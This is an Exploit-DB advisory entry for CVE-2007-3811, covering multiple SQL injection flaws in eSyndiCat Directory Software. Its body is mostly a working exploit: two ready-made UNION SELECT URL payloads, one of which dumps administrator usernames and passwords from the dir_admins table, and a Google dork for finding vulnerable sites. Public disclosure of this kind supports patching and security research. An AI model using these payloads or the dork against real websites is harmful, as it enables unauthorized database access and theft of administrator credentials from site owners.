eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities

2007-07-14T00:00:00
ID EDB-ID:4183
Type exploitdb
Reporter d3v1l
Modified 2007-07-14T00:00:00

Description

eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities. CVE-2007-3811. Webapps exploit for php platform

                                        
                                            [~] eSyndiCat: Multiple SQL Injection's
[~] 
[~] http://www.esyndicat.net/
[~] ----------------------------------------------------------
[~] Exploit coded and founded by d3v1l
[~] 
[~] Date: 14.07.2007
[~]
[~]
[~] stylers1@hotmail.it
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]  
[~] Security-Shell Members ( http://forum.security-shell.com )
[~]  
[~] Pentest | Gibon | Nocta | dr4g0n | deadfuneral | and str0ke
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20from%20dir_admins/*
[~]    
[~] http://site.com/page.php?name=-1%27%20union%20select%200,0,0,0,0,0,0,0,0/* 
[~] 
[~]
[~]---------------------------------------------------------------------------------------------------------------
[~] Google Dork: © 2005-2006 Powered by eSyndiCat Directory Software   

# milw0rm.com [2007-07-14]